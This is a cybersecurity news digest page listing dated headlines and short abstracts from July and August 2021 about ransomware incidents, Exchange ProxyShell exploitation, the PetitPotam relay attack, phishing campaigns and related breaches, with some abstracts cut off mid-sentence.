Microsoft is warning of a widespread credential phishing campaign that leverages open redirector links in email communications as a vector to trick users into visiting malicious websites while effectively bypassing security software. "Attackers combine these links with social engineering baits that impersonate well-known productivity tools and services to lure users into clicking," Microsoft 365 Defender Threat Intelligence Team said in a report published this week. "Doing so leads to a series of redirections — including a CAPTCHA verification page that adds a sense of legitimacy and attempts to evade some automated analysis systems — before taking the user to a fake sign-in page. This ultimately leads to credential compromise, which opens the user and their organization to other attacks." Although redirect links in email messages serve a vital tool to take recipients to third-party websites or track click rates and measure the success of sales and marketinThe Hacker News
August 28, 2021
Boffins show PIN bypass attack Mastercard and Maestro contactless payments Full Text
Abstract
Boffins from the Swiss ETH Zurich university demonstrated PIN bypass attack on contactless cards from Mastercard and Maestro. A group of researchers from the Swiss ETH Zurich university has discovered a vulnerability that allowed them to bypass...Security Affairs
August 27, 2021
Victims of Ragnarok ransomware can decrypt their files for free Full Text
Abstract
Ragnarok ransomware operators are ceasing their operations and released the master key that can allow their victims to decrypt files for free. The Ragnarok ransomware group has been active since at least January 2020 and hit dozens of organizations...Security Affairs
August 27, 2021
China’s Microsoft Hack May Have Had A Bigger Purpose Than Just Spying Full Text
Abstract
The China-linked cyber intruders broke into Exchange by finding a handful of coding errors that gave them entry into Exchange servers and then allowed them to take control.NPR
August 26, 2021
Microsoft Breaks Silence on Barrage of ProxyShell Attacks Full Text
Abstract
versions of the software are affected by a spate of bugs under active exploitations.Threatpost
August 26, 2021
Singapore Eye Clinic Suffers Ransomware Attack Impacting Patients’ Personal Information Full Text
Abstract
A ransomware attack earlier this month has affected the personal data and clinical information of nearly 73,500 patients of a private eye clinic, the third such reported incident in a month.Straits Times
August 24, 2021
The Proliferation of LockBit 2.0 Attacks Full Text
Abstract
According to the latest telemetry by Trend Micro, researchers revealed that they had detected multiple LockBit 2.0 attack attempts in Chile, Italy, Taiwan, and the U.K.Cyware Alerts - Hacker News
August 24, 2021
Resurgence in FluBot Malware Attacks Full Text
Abstract
Recent studies on the FluBot banking malware confirmed that there has been a spike in the number of malicious distribution pages affecting a number of Australian, Polish, and German banks.Cyware Alerts - Hacker News
August 24, 2021
A Year-Long Spear-Phishing Campaign Ensnares Office 365 Users Full Text
Abstract
The hackers changed their obfuscation and encryption techniques every 37 days. This implies that the gang is highly motivated and possesses sophisticated detection evasion mechanisms.Cyware Alerts - Hacker News
August 24, 2021
DLL side-loading Attack Takes Advantage of Windows Search Order Full Text
Abstract
Threat actors can evade detection using filename matching by renaming the binary executable, as the side-loading technique will remain viable regardless of the name of the executable.GB Hackers
August 23, 2021
ProxyShell Attacks Pummel Unpatched Exchange Servers Full Text
Abstract
CISA is warning about a surge of ProxyShell attacks, as Huntress discovered 140 webshells launched against 1,900 unpatched Microsoft Exchange servers.Threatpost
August 23, 2021
Ransomware Hits Lojas Renner, Brazil’s Largest Clothing Store Chain Full Text
Abstract
Lojas Renner, Brazil’s largest clothing department store chain, said it suffered a ransomware attack that impacted its IT infrastructure and resulted in the unavailability of some of its systems, including its official web store.The Record
August 23, 2021
Post Office is new prime target in UK parcel delivery phishing attacks Full Text
Abstract
Along with this increased volume of online shopping, a new trend of phishing attacks is doing rounds where cybercriminals impersonate parcel delivery companies in an attempt to steal financial details from their victims.Netcraft
August 23, 2021
PRISM attacks fly under the radar Full Text
Abstract
AT&T Alien Labs has recently discovered a cluster of Linux ELF executables that have low or zero anti-virus detections in VirusTotal though their internal threat analysis systems have flagged them as malicious.AT&T Cybersecurity
August 22, 2021
U.S. State Department reportedly hit by a cyberattack in recent weeks Full Text
Abstract
As per reports, the U.S. State Department was hit by a cyberattack, and notifications of a potentially serious breach were made by the Department of Defense Cyber Command.CNBC
August 22, 2021
WARNING: Microsoft Exchange Under Attack With ProxyShell Flaws Full Text
Abstract
The U.S. Cybersecurity and Infrastructure Security Agency is warning of active exploitation attempts that leverage the latest line of " ProxyShell " Microsoft Exchange vulnerabilities that were patched earlier this May, including deploying LockFile ransomware on compromised systems. Tracked as CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207, the vulnerabilities enable adversaries to bypass ACL controls, elevate privileges on the Exchange PowerShell backend, effectively permitting the attacker to perform unauthenticated, remote code execution. While the former two were addressed by Microsoft on April 13, a patch for CVE-2021-31207 was shipped as part of the Windows maker's May Patch Tuesday updates. "An attacker exploiting these vulnerabilities could execute arbitrary code on a vulnerable machine," CISA said . The development comes a little over a week after cybersecurity researchers sounded the alarm on opportunistic scanning and exploitation of unpatThe Hacker News
August 21, 2021
Microsoft Exchange servers being hacked by new LockFile ransomware Full Text
Abstract
A new ransomware gang known as LockFile encrypts Windows domains after hacking into Microsoft Exchange servers using the recently disclosed ProxyShell vulnerabilities.BleepingComputer
August 21, 2021
U.S. State Department was recently hit by a cyber attack Full Text
Abstract
The U.S. State Department was recently hit by a cyber attack, the Department of Defense Cyber Command might have suffered a serious breach. The U.S. State Department was recently hit by a cyber attack, the Department of Defense Cyber Command is notifying...Security Affairs
August 21, 2021
OPAD: A New Adversarial Attack Targeting Artificial Intelligence Full Text
Abstract
Researchers discovered a new adversarial attack, OPAD, that can gull AI technologies to modify the appearance of real 3D objects. One of the critical factors of such an attack is that no physical access is required for the objects. The successful demonstration of OPAD shows the possibility of ... Read MoreCyware Alerts - Hacker News
August 21, 2021
Lojas Renner, Brazilian largest clothing store chain, was hit by ransomware Full Text
Abstract
Lojas Renner, the largest Brazilian department stores clothing company, suffered a ransomware attack that impacted its IT infrastructure. Lojas Renner, the largest Brazilian department stores clothing company, announced to have suffered a ransomware...Security Affairs
August 20, 2021
Cloudflare mitigated the largest ever volumetric DDoS attack to date Full Text
Abstract
Web infrastructure and website security company Cloudflare announced to have mitigated the largest ever volumetric DDoS attack to date. Cloudflare, the web infrastructure and website security company, announced that it has mitigated the largest ever...Security Affairs
August 19, 2021
Threat actors hacked US Census Bureau in 2020 by exploiting a Citrix flaw Full Text
Abstract
Threat actors breached the servers of US Census Bureau on January 11, 2020, exploiting an unpatched Citrix ADC zero-day vulnerability, OIG revealed. A report published by the US Office of Inspector General (OIG) revealed that threat actors breached...Security Affairs
August 18, 2021
US Census Bureau hacked in January 2020 using Citrix exploit Full Text
Abstract
US Census Bureau servers were breached on January 11, 2020, by hackers after exploiting an unpatched Citrix ADC zero-day vulnerability as the US Office of Inspector General (OIG) disclosed in a recent report.BleepingComputer
August 18, 2021
Japan’s Tokio Marine is the latest insurer to be victimized by ransomware Full Text
Abstract
Ransomware struck Japan’s largest property and casualty insurer, Tokio Marine Holdings, at its Singapore branch. It’s the third major insurer to disclose a ransomware attack in recent months.Cyberscoop
August 18, 2021
New ‘Optical Adversarial Attack’ uses low-cost projector to trick AI Full Text
Abstract
The new attack has been dubbed as an OPtical ADversarial attack (OPAD) and involves using three objects: a low-cost projector, a camera, and a computer in order to execute the attack.Hackread
August 18, 2021
Japanese insurer Tokio Marine discloses ransomware attack Full Text
Abstract
Tokio Marine Holdings, a multinational insurance holding company in Japan, announced this week that its Singapore branch, Tokio Marine Insurance Singapore (TMiS), suffered a ransomware attack.BleepingComputer
August 17, 2021
Govt hackers impersonate HR employees to hit Israeli targets Full Text
Abstract
Hackers associated with the Iranian government have focused attack efforts on IT and communication companies in Israel, likely in an attempt to pivot to their real targets.BleepingComputer
August 17, 2021
Malware campaign uses clever ‘captcha’ to bypass browser warning Full Text
Abstract
A malware campaign uses a clever captcha prompt to trick users into bypassing browsers warnings to download the Ursnif (aka Gozi) banking trojan.BleepingComputer
August 17, 2021
Confucius Uses Pegasus Spyware-related Lures to Target Pakistani Military Full Text
Abstract
The campaign involves a two-step attack. During the first phase, an email without a malicious payload containing content copied from a legitimate Pakistani newspaper’s article is sent to the target.Trend Micro
August 17, 2021
Brazilian government discloses National Treasury ransomware attack Full Text
Abstract
The Brazilian Ministry of Economy has disclosed a ransomware attack that hit some of National Treasury's computing systems on Friday night, right before the start of the weekend.BleepingComputer
August 17, 2021
Brazilian National Treasury Hit with Ransomware Attack Impacting IT Systems Full Text
Abstract
The first assessments so far have found there was no damage to the structuring systems of the National Treasury, such as the platforms relating to public debt administration.ZDNet
August 17, 2021
Memorial Health System in Ohio Latest to be Hit With Ransomware Attack Full Text
Abstract
Memorial Health System detected a security incident early on Sunday morning that prompted the organization to divert emergency care patients from three of its hospitals to other area facilities.Gov Info Security
August 16, 2021
Hive ransomware attacks Memorial Health System, steals patient data Full Text
Abstract
In what appears to be an attack from the Hive ransomware gang, computers of the non-profit Memorial Health System have been encrypted, forcing staff to work with paper charts.BleepingComputer
August 16, 2021
T-Mobile confirms servers were hacked, investigates data breach Full Text
Abstract
T-Mobile has confirmed that threat actors hacked their servers in a recent cyber attack but still investigate whether customer data was stolen.BleepingComputer
August 16, 2021
New Code-poisoning Attack could Corrupt Your ML Models Full Text
Abstract
A group of researchers discovered a new type of code-poisoning attack that can manipulate natural-language modeling systems via a backdoor. By nature, this is a blind attack, in which the attacker does not require to observe the execution of their code or the weights of the backdoored model during ... Read MoreCyware Alerts - Hacker News
August 16, 2021
AMD Secure Encrypted Virtualization undone by electrical attack Full Text
Abstract
The attack was inspired by a separate attack, dubbed Voltpillager, used to defeat Intel's Software Guard Extensions (SGX), a similar secure enclave system for x86 microarchitecture.The Register
August 15, 2021
Glowworm Attack allows sound recovery via a device’s power indicator LED Full Text
Abstract
The Glowworm attack leverages optical emanations from a device's power indicator LED to recover sounds from connected peripherals and spy on electronic conversations. Boffins from the Ben-Gurion University of the Negev devised a new attack technique,...Security Affairs
August 14, 2021
New Glowworm Attack Recovers Device’s Sound from Its LED Power Indicator Full Text
Abstract
A novel technique leverages optical emanations from a device's power indicator LED to recover sounds from connected peripherals and spy on electronic conversations from a distance of as much as 35 meters. Dubbed the " Glowworm attack ," the findings were published by a group of academics from the Ben-Gurion University of the Negev earlier this week, describing the method as "an optical TEMPEST attack that can be used by eavesdroppers to recover sound by analysing optical measurements obtained via an electro-optical sensor directed at the power indicator LED of various devices." Accompanying the experimental setup is an optical-audio transformation (OAT) that allows for retrieving sound by isolating the speech from the optical measurements obtained by directing an electro-optical sensor at the device's power indicator LED. TEMPEST is the codename for unintentional intelligence-bearing emanations produced by electronic and electromechanical information-The Hacker News
August 14, 2021
Scripps Health Reports Financial Toll of Ransomware Attack Full Text
Abstract
The recent ransomware attack that disrupted Scripps Health's IT systems and patient care for nearly a month has so far cost the San Diego-based organization nearly $113 million, including $91.6 million in lost revenue.Gov Info Security
August 13, 2021
Exchange Servers Under Active Attack via ProxyShell Bugs Full Text
Abstract
There’s an entirely new attack surface in Exchange, a researcher revealed at Black Hat, and threat actors are now exploiting servers vulnerable to the RCE bugs.Threatpost
August 13, 2021
Cyberattack hits vaccine records for thousands of Canada’s Durham Region children Full Text
Abstract
The personal information of more than 3000 children in daycares throughout Durham Region was stolen in a cyberattack early this year that CTV News Toronto has learned is larger than previously known.CTV News
August 13, 2021
Cornell University Researchers Uncover Backdoor Attack to Evade Any Known Defense Full Text
Abstract
A team of researchers have uncovered a new type of backdoor attack that they showed can "manipulate natural-language modeling systems to produce incorrect outputs and evade any known defense."ZDNet
August 13, 2021
Why Is There A Surge In Ransomware Attacks? Full Text
Abstract
The U.S. is presently combating two pandemics--coronavirus and ransomware attacks. Both have partially shut down parts of the economy. However, in the case of cybersecurity, lax security measures allow hackers to have an easy way to rake in millions. It's pretty simple for hackers to gain financially, using malicious software to access and encrypt data and hold it hostage until the victim pays the ransom. Cyber attacks are more frequent now because it is effortless for hackers to execute them. Further, the payment methods are now friendlier to them. In addition, businesses are willing to pay a ransom because of the growing reliance on digital infrastructure, giving hackers more incentives to attempt more breaches. Bolder cybercriminals A few years back, cybercriminals played psychological games before getting bank passwords and using their technical know-how to steal money from people's accounts. They are bolder now because it is easy for them to buy ransomware softwareThe Hacker News
August 13, 2021
Microsoft warns of a evasive year-long spear-phishing campaign targeting Office 365 users Full Text
Abstract
Microsoft warns of a long-running spear-phishing campaign that has targeted Office 365 customers in multiple attacks since July 2020. Microsoft revealed that a year-long spear-phishing campaign has targeted Office 365 customers in multiple attacks...Security Affairs
August 12, 2021
IT Giant Accenture Hit by LockBit Ransomware; Hackers Threaten to Leak Data Full Text
Abstract
Global IT consultancy giant Accenture has become the latest company to be hit by the LockBit ransomware gang, according to a post made by the operators on their dark web portal, likely filling a void left in the wake of DarkSide and REvil shutdown. "These people are beyond privacy and security. I really hope that their services are better than what I saw as an insider," read a message posted on the data leak website. Accenture said it has since restored the affected systems from backups. LockBit, like its now-defunct DarkSide and REvil counterparts, operates using a ransomware-as-a-service (RaaS) model, roping in other cybercriminals (aka affiliates) to carry out the intrusion using its platform, with the payments often divided between the criminal entity directing the attack and the core developers of the malware. The ransomware group emerged on the threat landscape in September 2019, and in June 2021 launched LockBit 2.0 along with an advertising campaign to recruitThe Hacker News
August 11, 2021
Consulting group Accenture hit by cyberattack Full Text
Abstract
Global consulting group Accenture confirmed Wednesday that it had been hit by a cyberattack, becoming the latest in a string of organizations in recent months to be targeted.The Hill
August 11, 2021
Accenture has been hit by a LockBit 2.0 ransomware attack Full Text
Abstract
Global consulting giant Accenture has allegedly been hit by a ransomware attack carried out by LockBit 2.0 ransomware operators. IT and consulting giant Accenture was hit by a ransomware attack carried out by LockBit 2.0 ransomware operators,...Security Affairs
August 11, 2021
DBREACH: A New Attack Against Databases Full Text
Abstract
Researchers have detailed a new type of attack called Database Reconnaissance and Exfiltration via Adaptive Compression Heuristics (DBREACH) against databases at the Black Hat US 2021 hybrid event. It could result in information disclosure and loss. Attackers can further monitor the database us ... Read MoreCyware Alerts - Hacker News
August 10, 2021
LockBit Ransomware Attacks Rise, Warns ACSC Full Text
Abstract
The Australian Cyber Security Centre (ACSC) issued an alert warning of increasing attacks on Australian organizations across multiple industry sectors by the LockBit 2.0 ransomware.Cyware Alerts - Hacker News
August 10, 2021
Illinois’ FOID Card System Hit By Cyber Attack Full Text
Abstract
On the heels of cyber attacks on the Illinois Attorney General's Office and the Illinois Department of Employment Security, comes word of trouble for the Illinois State Police (ISP).1440wrok
August 10, 2021
RansomEXX Hackers Threaten to Leak Data of Intel, AMD After Attack on Gigabyte Full Text
Abstract
The RansomExx gang is threatening to release more than 112 GB of data that may include confidential documents from chip makers Intel and AMD and American firm Megatrends.The Times Of India
August 9, 2021
‘Glowworm’ Attack Turns Power Light Flickers into Audio Full Text
Abstract
Researchers have found an entirely new attack vector for eavesdropping on Zoom and other virtual meetings.Threatpost
August 9, 2021
City of Joplin paid a 320K ransom after a ransomware Attack Full Text
Abstract
A ransomware attack hit City of Joplin forcing the IT staff to shutdown the City computer. Finally the insurer for Joplin paid $320,000 to threat actors. A ransomware attack last month hit the City of Joplin forcing the IT staff to shut down the city’s...Security Affairs
August 7, 2021
RansomEXX ransomware hit computer manufacturer and distributor GIGABYTE Full Text
Abstract
Taiwanese manufacturer and distributor of computer hardware GIGABYTE was a victim of the RansomEXX ransomware gang. RansomEXX ransomware gang hit the Taiwanese manufacturer and distributor of computer hardware GIGABYTE and claims to have stolen...Security Affairs
August 06, 2021
Computer hardware giant GIGABYTE hit by RansomEXX ransomware Full Text
Abstract
Taiwanese motherboard maker Gigabyte has suffered a RansomEXX ransomware attack where threat actors threaten to release 112 GB of data if a ransom is not paid.BleepingComputer
August 05, 2021
Prometheus: The $250 service behind recent malware attacks Full Text
Abstract
Security researchers investigating multiple malware distribution campaigns found that an underground traffic distribution service called Prometheus is responsible for delivering threats that often lead to ransomware attacks.BleepingComputer
August 5, 2021
Italian energy company ERG hit by LockBit 2.0 ransomware gang Full Text
Abstract
ERG SPA, an Italian energy company, reports a minor impact on its operations after the recent ransomware attack conducted by LockBit 2.0 gang. Recently the Italian energy company ERG was hit by the LockBit 2.0 ransomware gang, now the company reported...Security Affairs
August 05, 2021
A Wide Range of Cyber Attacks Leveraging Prometheus TDS Malware Service Full Text
Abstract
Multiple cybercriminal groups are leveraging a malware-as-a-service (MaaS) solution to distribute a wide range of malicious software distribution campaigns that result in the deployment of payloads such as Campo Loader, Hancitor, IcedID , QBot , Buer Loader , and SocGholish against individuals in Belgium as well as government agencies, companies, and corporations in the U.S. Dubbed " Prometheus TDS " (short for Traffic Direction System) and available for sale on underground platforms for $250 a month since August 2020, the service is designed to distribute malware-laced Word and Excel documents and divert users to phishing and malicious sites, according to a Group-IB report shared with The Hacker News. More than 3,000 email addresses are said to have been singled out via malicious campaigns in which Prometheus TDS was used to send malicious emails, with banking and finance, retail, energy and mining, cybersecurity, healthcare, IT, and insurance emerging the prominentThe Hacker News
August 4, 2021
Kaseya ransomware attack sets off race to hack service providers -researchers Full Text
Abstract
Now that criminals see how powerful MSP attacks can be, “they are already busy, they have already moved on and we don’t know where,” said Victor Gevers, head of the Dutch institute that warned Kaseya.Reuters
August 4, 2021
Isle of Wight schools hit by ransomware Full Text
Abstract
The attack, which encrypted data, hit the schools and their umbrella organization the Isle of Wight of Education Federation between July 28th and 29th, according to the Federation.Computing
August 04, 2021
Russian Federal Agencies Were Attacked With Chinese Webdav-O Virus Full Text
Abstract
An amalgam of multiple state-sponsored threat groups from China may have been behind a string of targeted attacks against Russian federal executive authorities in 2020. The latest research, published by Singapore-headquartered company Group-IB, delves into a piece of computer virus called " Webdav-O " that was detected in the intrusions, with the cybersecurity firm observing similarities between the tool and that of popular Trojan called " BlueTraveller ," that's known to be connected to a Chinese threat group called TaskMasters and deployed in malicious activities with the aim of espionage and plundering confidential documents. "Chinese APTs are one of the most numerous and aggressive hacker communities," researchers Anastasia Tikhonova and Dmitry Kupin said . "Hackers mostly target state agencies, industrial facilities, military contractors, and research institutes. The main objective is espionage: attackers gain access to confidential dataThe Hacker News
August 4, 2021
Advanced Technology Ventures Suffers Ransomware Attack Impacting Personal Information of Limited Partners Full Text
Abstract
In its letter to the Maine AG’s office, ATV said it believes the names, email addresses, phone numbers, and Social Security numbers of the individual investors in its funds were stolen in the attack.TechCrunch
August 04, 2021
New Chinese Spyware Being Used in Widespread Cyber Espionage Attacks Full Text
Abstract
A threat actor presumed to be of Chinese origin has been linked to a series of 10 attacks targeting Mongolia, Russia, Belarus, Canada, and the U.S. from January to July 2021 that involve the deployment of a remote access trojan (RAT) on infected systems, according to new research. The intrusions have been attributed to an advanced persistent threat named APT31 (FireEye), which is tracked by the cybersecurity community under the monikers Zirconium (Microsoft), Judgement Panda (CrowdStrike), and Bronze Vinewood (Secureworks). The group is a "China-nexus cyber espionage actor focused on obtaining information that can provide the Chinese government and state-owned enterprises with political, economic, and military advantages," according to FireEye. Positive Technologies, in a write-up published Tuesday, revealed a new malware dropper that was used to facilitate the attacks, including the retrieval of next-stage encrypted payloads from a remote command-and-control server,The Hacker News
August 03, 2021
Ransomware attack hits Italy’s Lazio region, affects COVID-19 site Full Text
Abstract
The Lazio region in Italy has suffered a reported ransomware attack that has disabled the region's IT systems, including the COVID-19 vaccination registration portal.BleepingComputer
July 30, 2021
An Indian firm facing 1,738 cyber attacks a week on average, claims report Full Text
Abstract
An organization in India faced cyberattack 1,738 times on average per week in the last six months compared to 757 attacks per organization globally, a report showed on Thursday.The Times Of India
July 30, 2021
Entertainment Tech Provider D-Box Discloses Ransomware Attack Impacting IT Systems Full Text
Abstract
In a recent statement, the Canadian immersive entertainment technology provider said it was “gradually resuming its activities following a ransomware cyber-attack” first publicly disclosed on July 14.The Daily Swig
July 30, 2021
Meteor was the wiper used against Iran’s national railway system Full Text
Abstract
The recent attack against Iran’s national railway system was caused by a wiper malware dubbed Meteor and not by a ransomware as initially thought. According to research from Amnpardaz and SentinelOne, the recent attack...Security Affairs
July 28, 2021
Chinese cyberspies used a new PlugX variant, dubbed THOR, in attacks against MS Exchange Servers Full Text
Abstract
A China-linked cyberespionage group, tracked as PKPLUG, employed a previously undocumented strain of a RAT dubbed THOR in recent attacks. A China-linked cyberespionage group tracked as PKPLUG (aka Mustang Panda and HoneyMyte), which...Security Affairs
July 28, 2021
Axie Infinity Player Wallets Targeted by Poisoned Google Ads Content Full Text
Abstract
The top NFT Ethereum-based game Axie infinity, is a Pokemon-like play-to-earn game that lets its users earn SLP (Smooth Love Potion). Threat actors are targeting the players with a fake crypto wallet.Cyren
July 27, 2021
South Africa’s logistics company Transnet SOC hit by a ransomware attack Full Text
Abstract
Transnet SOC Ltd, a large South African rail, port and pipeline company, announced it was hit by a disruptive cyber attack. South Africa’s logistics company Transnet SOC was hit last week by a disruptive cyberattack that halted its operations...Security Affairs
July 26, 2021
Microsoft Warns of Weeks-long Malspam Campaign Abusing HTML Smuggling to Bypass Email Security Systems Full Text
Abstract
As explained by SecureTeam and Outflank, HTML smuggling is a technique that allows threat actors to assemble malicious files on users’ devices by clever use of HTML5 and JavaScript code.The Record
July 26, 2021
New PetitPotam NTLM Relay Attack Lets Hackers Take Over Windows Domains Full Text
Abstract
A newly uncovered security flaw in the Windows operating system can be exploited to coerce remote Windows servers, including Domain Controllers, to authenticate with a malicious destination, thereby allowing an adversary to stage an NTLM relay attack and completely take over a Windows domain. The issue, dubbed " PetitPotam ," was discovered by security researcher Gilles Lionel, who shared technical details and proof-of-concept (PoC) code last week, noting that the flaw works by forcing "Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw function." MS-EFSRPC is Microsoft's Encrypting File System Remote Protocol that's used to perform "maintenance and management operations on encrypted data that is stored remotely and accessed over a network." Specifically, the attack enables a domain controller to authenticate against a remote NTLM under a bad actor's control using the MS-EFSRPC interface and share its authenThe Hacker News
July 25, 2021
WhatsApp chief: US allies’ national security officials targeted with NSO malware Full Text
Abstract
High-ranking government officials around the world were targeted by governments using spyware from NSO Group, according to WhatsApp head Will Cathcart.The Hill
July 24, 2021
Japanese computers hit by a wiper malware ahead of 2021 Tokyo Olympics Full Text
Abstract
Japanese researchers spotted an Olympics-themed wiper targeting Japanese users ahead of the 2021 Tokyo Olympics. Tokyo Olympics could be a great opportunity for cybercriminals and malware authors, the US FBI warned private US companies of cyberattacks...Security Affairs
July 24, 2021
Obtaining password hashes of Windows systems with PetitPotam attack Full Text
Abstract
A researcher found a flaw in Windows OS, tracked as PetitPotam, that can be exploited to force remote Windows machines to share their password hashes. Security researcher Gilles Lionel (aka Topotam) has discovered a vulnerability in the Windows...Security Affairs
July 23, 2021
New PetitPotam attack allows take over of Windows domains Full Text
Abstract
A new NTLM relay attack called PetitPotam has been discovered that allows threat actors to take over a domain controller, and thus an entire Windows domain.BleepingComputer
July 23, 2021
Cyber attackers will have weaponised tech environments to harm or kill humans by 2025: Report Full Text
Abstract
In a new release from Gartner, researchers have estimated that cyberattackers will have weaponised operational technology (OT) environments to successfully harm or kill humans by the year 2025.The Times Of India
July 23, 2021
Significant Historical Cyber-Intrusion Campaigns Targeting ICS Full Text
Abstract
To raise awareness of the risks and improve the protection of critical infrastructure, CISA and the FBI have released a Joint Cybersecurity Advisory as well as updates to five alerts and advisories.US CERT
July 23, 2021
Kaseya obtained a universal decryptor for REvil ransomware attack Full Text
Abstract
The software provider Kaseya announced to have obtained a universal decryptor for the REvil ransomware. Earlier this month, a massive supply chain attack conducted by the REvil ransomware gang hit the cloud-based managed service provider platform...Security Affairs
July 21, 2021
Kubernetes Cloud Clusters Face Cyberattacks via Argo Workflows Full Text
Abstract
Misconfigured permissions for Argo’s web-facing dashboard allow unauthenticated attackers to run code on Kubernetes targets, including cryptomining containers.Threatpost
July 21, 2021
Kaseya ransomware attack highlights cyber vulnerabilities of small businesses Full Text
Abstract
The recent ransomware attack on software group Kaseya hit small businesses especially hard, targeting companies that often have few resources to defend themselves and highlighting long-standing vulnerabilities.The Hill
July 21, 2021
Rail ticket machines in northern England hit by ransomware attack Full Text
Abstract
Ticket machines operated by the British government-run Northern Trains have been put out of action by a suspected cyber-attack intended to extort money, the company said on Monday.Reuters
July 20, 2021
Microsoft secured court order to take down domains used in BEC campaign Full Text
Abstract
Microsoft has seized 17 malicious homoglyph domains used by crooks in a business email compromise (BEC) campaign targeting its users. Microsoft's Digital Crimes Unit (DCU) has seized 17 domains that were used by scammers in a business...Security Affairs
July 19, 2021
What’s Next for REvil’s Victims? Full Text
Abstract
Podcast: Nothing, says a ransomware negotiator who has tips on staying out of the sad subset of victims left in the lurch, mid-negotiation, after REvil’s servers went up in smoke.Threatpost
July 18, 2021
Ransomware hits law firm counseling Fortune 500, Global 500 companies Full Text
Abstract
Campbell Conroy & O'Neil, P.C. (Campbell), a US law firm counseling dozens of Fortune 500 and Global 500 companies, has disclosed a data breach following a February 2021 ransomware attack.BleepingComputer
July 18, 2021
Comparis customers targeted by scammers after ransomware attack Full Text
Abstract
Leading Swiss price comparison platform Comparis has notified customers of a data breach following a ransomware attack that hit and took down its entire network last week.BleepingComputer
July 17, 2021
Ecuador’s state-run CNT telco hit by RansomEXX ransomware Full Text
Abstract
Ecuador's state-run Corporación Nacional de Telecomunicación (CNT) has suffered a ransomware attack that has disrupted business operations, the payment portal, and customer support.BleepingComputer
July 16, 2021
Cyberattack on Moldova’s Court of Accounts destroyed public audits Full Text
Abstract
Moldova's "Court of Accounts" has suffered a cyberattack leading to the agency's public databases and audits being destroyed.BleepingComputer
July 15, 2021
SonicWall Warns Secure VPN Hardware Bugs Under Attack Full Text
Abstract
SonicWall issued an urgent security alert warning customers that some of its current and legacy secure VPN appliances were under active attack.Threatpost
July 15, 2021
Safari Zero-Day Used in Malicious LinkedIn Campaign Full Text
Abstract
Researchers shed light on how attackers exploited Apple web browser vulnerabilities to target government officials in Western Europe.Threatpost
July 15, 2021
Ransomware Attacks Targeting Unpatched EOL SonicWall SMA 100 VPN Appliances Full Text
Abstract
Networking equipment maker SonicWall is alerting customers of an "imminent" ransomware campaign targeting its Secure Mobile Access (SMA) 100 series and Secure Remote Access (SRA) products running unpatched and end-of-life 8.x firmware. The warning comes more than a month after reports emerged that remote access vulnerabilities in SonicWall SRA 4600 VPN appliances ( CVE-2019-7481 ) are being exploited as an initial access vector for ransomware attacks to breach corporate networks worldwide. "SonicWall has been made aware of threat actors actively targeting Secure Mobile Access (SMA) 100 series and Secure Remote Access (SRA) products running unpatched and end-of-life (EOL) 8.x firmware in an imminent ransomware campaign using stolen credentials," the company said . "The exploitation targets a known vulnerability that has been patched in newer versions of firmware." SMA 1000 series products are not affected by the flaw, SonicWall noted, urging businesseThe Hacker News
July 14, 2021
BazarBackdoor sneaks in through nested RAR and ZIP archives Full Text
Abstract
Security researchers caught a new phishing campaign that tried to deliver the BazarBackdoor malware by using the multi-compression technique and masking it as an image file.BleepingComputer
July 14, 2021
AttackIQ raises $44M to fuel global growth and vision of security optimization Full Text
Abstract
AttackIQ announced a $44 million Series C funding round led by Atlantic Bridge. Also, Kevin Dillon, Co-Founder and Managing Partner at Atlantic Bridge, also joined the company's Board of Directors.Help Net Security
July 14, 2021
Google: Russian SVR hackers targeted LinkedIn users with Safari zero-day Full Text
Abstract
Google security researcher shared more information on four security vulnerabilities also known as zero-days, unknown before they discovered them being exploited in the wild earlier this year.BleepingComputer
July 14, 2021
Trickbot improve its VNC module in recent attacks Full Text
Abstract
Trickbot botnet is back, its authors implemented updates for the VNC module used for remote control of infected systems. The Trickbot botnet continues to evolve despite the operations conducted by law enforcement aimed at dismantling it. The authors...Security Affairs
July 13, 2021
Hackers use new SolarWinds zero-day to target US Defense orgs Full Text
Abstract
China-based hackers actively target US defense and software companies using a vulnerability in the SolarWinds Serv-U FTP server.BleepingComputer
July 13, 2021
Chinese Hackers Exploit Latest SolarWinds 0-Day to Target U.S. Defense Firms Full Text
Abstract
Microsoft on Tuesday disclosed that the latest string of attacks targeting SolarWinds Serv-U managed file transfer service with a now-patched remote code execution (RCE) exploit is the handiwork of a Chinese threat actor dubbed "DEV-0322." The revelation comes days after the Texas-based IT monitoring software maker issued fixes for the flaw that could enable adversaries to remotely run arbitrary code with privileges, allowing them to perform actions like install and run malicious payloads or view and alter sensitive data. Tracked as CVE-2021-35211 , the RCE flaw resides in Serv-U's implementation of the Secure Shell (SSH) protocol. While it was previously revealed that the attacks were limited in scope, SolarWinds said it's "unaware of the identity of the potentially affected customers." Attributing the intrusions with high confidence to DEV-0322 (short for "Development Group 0322") based on observed victimology, tactics, and procedures, MicrThe Hacker News
July 13, 2021
Fashion brand Guess hacked, DarkSide ransomware group the likely culprit Full Text
Abstract
The company’s investigation determined that social security numbers, driver’s license numbers, passport numbers and/or financial account numbers may have been accessed or acquired.SCMagazine
July 10, 2021
Iran’s railroad system was hit by a cyberattack, hackers posted fake delay messages Full Text
Abstract
Iran's railroad system was hit by a cyberattack, hackers posted fake messages about delays or cancellations of the trains on display boards at stations across the country. Iran's railroad system was hit by a cyberattack, threat actors published fake...Security Affairs
July 10, 2021
Ransomware attack hits Swiss consumer outlet Comparis Full Text
Abstract
Comparis said its website - which lets consumers compare prices for goods and services - was working normally again, but access via e-mail and customer hotline may still be limited as it works with cybersecurity specialists on a complete recovery.Reuters
July 09, 2021
Ukraine says Russian-linked hackers attacked its navy’s website Full Text
Abstract
Ukraine said Friday that it believes Russian-linked hackers were responsible for hacking the Ukrainian navy's website and publishing a series of fake reports about its ongoing Sea Breeze military drills taking place in the Black Sea.The Hill
July 9, 2021
Kaseya attack spotlights potential gaps in managed service provider model Full Text
Abstract
Where are the failures in vendor and MSP relationships that could introduce risks, and what tactics could help close the gaps? SC Media spoke to supply chain experts to examine the complexities.SCMagazine
July 8, 2021
Year-long spear-phishing campaign targets global energy industry Full Text
Abstract
Many of the spear-phishing emails show the threat actor did their homework, with procurement jargon and references to real executives and ongoing projects.SCMagazine
July 8, 2021
Online course provider Coursera hit with API issues, with cloud driving additional exposure Full Text
Abstract
APIs have been around for years, but the adoption of cloud and cloud services are leading drivers behind explosive use recently, enabling attackers to elevate privileges and move laterally throughout networks.SCMagazine
July 08, 2021
